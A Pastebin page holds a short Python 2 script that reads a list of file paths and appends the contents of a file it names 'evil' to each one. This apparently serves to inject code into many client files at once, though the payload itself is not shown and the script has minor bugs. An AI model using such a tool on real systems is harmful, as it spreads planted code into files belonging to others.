Guest User

Untitled

a guest
Oct 19th, 2018
85
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 0.31 KB | None | 0 0
  1. #!/usr/bin/python
  2.  
  3.  
  4. clients_index = open('clients').readlines()
  5. evil = open('jdb','r').readlines()
  6. for path in clients_index:
  7.     path = path.replace('\n','')
  8.     try:
  9.         modd_file = open(path,'aw')
  10.     except Exception,e :
  11.         print "[-] Caught:", e
  12.  
  13.     for lines in evil:
  14.         modd_file.write(lines)
  15.    
  16.     modd_file.close
Add Comment
Please, Sign In to add comment